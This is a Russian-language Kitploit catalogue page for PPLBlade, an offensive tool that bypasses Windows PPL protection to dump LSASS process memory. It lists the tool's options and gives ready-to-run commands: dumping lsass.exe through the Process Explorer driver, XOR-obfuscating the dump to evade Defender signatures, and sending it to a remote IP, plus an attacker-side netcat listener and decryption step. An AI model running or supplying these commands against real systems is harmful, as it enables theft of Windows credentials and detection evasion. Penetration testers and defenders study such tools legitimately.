Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PPLBlade — Обходит защиту PPL, чтобы снять дамп памяти процесса LSASS, обфусцирует файлы дампа с помощью XOR и удаленно выгружает их через RAW или SMB без записи на диск. | Kitploit
Инструменты/GitHubGitHub/tastypepperoni/pplblade
Повышение привилегийКриминалистика памятиЭксплуатацияЭксфильтрация данныхПост-эксплуатация
GitHubtastypepperoni/pplblade

PPLBlade

Обходит защиту PPL, чтобы снять дамп памяти процесса LSASS, обфусцирует файлы дампа с помощью XOR и удаленно выгружает их через RAW или SMB без записи на диск.

Репозиторий
597632 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PPLBlade

Инструмент для дампа защищенных процессов, поддерживающий обфускацию дампа памяти и передачу его на удаленные рабочие станции без сохранения на диск.

Ключевые функции:

  1. Обход защиты PPL
  2. Обфускация файлов дампа памяти для обхода сигнатурных механизмов обнаружения Defender
  3. Загрузка дампа памяти методами RAW и SMB без сохранения на диск (бесфайловый дамп)

Обзор методов, используемых в этом инструменте, можно найти здесь: https://tastypepperoni.medium.com/bypassing-defenders-lsass-dump-detection-and-ppl-protection-in-go-7dd85d9a32e6

Обратите внимание, что PROCEXP15.SYS указан в исходных файлах для целей компиляции. Его не нужно переносить на целевую машину вместе с PPLBlade.exe.

Он уже встроен в PPLBlade.exe. Эксплойт представляет собой единый исполняемый файл.

Режимы:

  1. Dump - Дамп памяти процесса по PID или имени процесса
  2. Decrypt - Преобразование обфусцированного (--obfuscate) файла дампа в исходное состояние
  3. Cleanup - Ручная очистка на случай, если что-то пошло не так при выполнении (Обратите внимание, что значения параметров должны совпадать с теми, что использовались при выполнении, которое мы пытаемся очистить)
  4. DoThatLsassThing - Дамп lsass.exe с использованием драйвера Process Explorer (базовый PoC)

Режимы получения дескриптора:

  1. Direct - Открывает дескриптор PROCESS_ALL_ACCESS напрямую, используя функцию OpenProcess()
  2. Procexp - Использует PROCEXP152.sys для получения дескриптора
root@kitploit:~
Usage of PPLBlade.exe:
  -driver string
        Path where the driver file will be dropped (default: current directory)
  -dumpmode string
        Dump mode [local|network] (default "local")
  -dumpname string
        Name of the dump file (default "PPLBlade.dmp")
  -handle string
        Method to obtain target process handle [direct|procexp] (default "direct")
  -help
        Prints this help message
  -ip string
        IP of the remote server
  -key string
        XOR Key for obfuscation (default "PPLBlade")
  -mode string
        Kill or Dump process [dump|decrypt|cleanup|dothatlsassthing] (default "dump")
  -name string
        Process name of target process
  -network string
        Method for network transfer[raw|smb] (default "raw")
  -obfuscate
        Obfuscate dump file
  -pass string
        SMB password
  -pid int
        PID of target process (prioritized over process name)
  -port int
        PORT on the remote server
  -quiet
        Quiet mode
  -service string
        Name of the service (default "PPLBlade")
  -share string
        share name
  -user string
        SMB username

Examples:
PPLBlade.exe --mode dothatlsassthing
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234
PPLBlade.exe --mode decrypt --dumpname PPLBlade.dmp --key PPLBlade
PPLBlade.exe --mode cleanup

Примеры:

Базовый PoC, использующий PROCEXP152.sys для дампа lsass:

root@kitploit:~
PPLBlade.exe --mode dothatlsassthing

(Обратите внимание, что он не применяет XOR к файлу дампа; добавьте флаг --obfuscate, чтобы включить функцию XOR)

Загрузка обфусцированного дампа LSASS на удаленный хост:

root@kitploit:~
PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Хост атакующего:

root@kitploit:~
nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Деобфускация дампа памяти:

root@kitploit:~
PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade
Скачать инструмент